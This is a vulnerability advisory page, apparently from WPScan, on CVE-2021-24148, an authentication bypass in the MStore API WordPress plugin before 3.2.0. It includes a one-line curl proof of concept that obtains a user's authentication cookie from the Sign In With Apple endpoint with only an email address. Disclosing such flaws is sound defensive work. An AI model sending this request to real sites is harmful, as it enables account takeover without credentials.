logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

MStore API < 3.2.0 - Authentication Bypass With Sign In With Apple

Description

The plugin had an authentication bypass with Sign In With Apple allowing unauthenticated users to recover an authentication cookie with only an email address.

Proof of Concept

The plugin must have a valid purchase code for the request to work

curl -X GET --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "email": "[email protected]" }' https://example.com/wp-json/api/flutter_user/apple_login

Affects Plugins

mstore-api

Fixed in version 3.2.0

References

CVE

CVE-2021-24148

URL

https://blog.webble.fr/critical-authentication-bypass-in-mstore-api/

URL

https://www.notion.so/Changelog-7848b70b11cf4403893f1e2dd708345c

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-287

Miscellaneous

Original Researcher

Vincent Datrier

Submitter

Vincent Datrier

Verified

Yes

WPVDB ID

bf5ddc43-974d-41fa-8276-c1a27d3cc882

Timeline

Publicly Published

2021-02-02 (about 8 months ago)

Added

2021-02-02 (about 8 months ago)

Last Updated

2021-02-18 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin